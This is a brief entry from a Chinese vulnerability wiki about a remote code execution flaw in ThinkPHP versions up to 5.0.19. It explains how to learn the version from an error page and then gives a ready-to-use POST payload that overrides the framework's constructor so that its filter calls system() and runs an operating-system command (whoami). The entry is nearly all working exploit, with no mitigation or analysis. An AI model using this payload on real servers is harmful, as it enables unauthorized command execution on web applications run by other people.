免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
影响版本
ThinkPHP <= v5.0.19
漏洞利用
通过报错确定ThinkPHP版本
http://127.0.0.1/tk5/public/index.php/111
Payload
http://127.0.0.1/tk5/public/index.php
post发送数据
s=whoami&_method=__construct&method=&filter=system
免费、自由、人人可编辑的漏洞库
◆◆0
返回顶部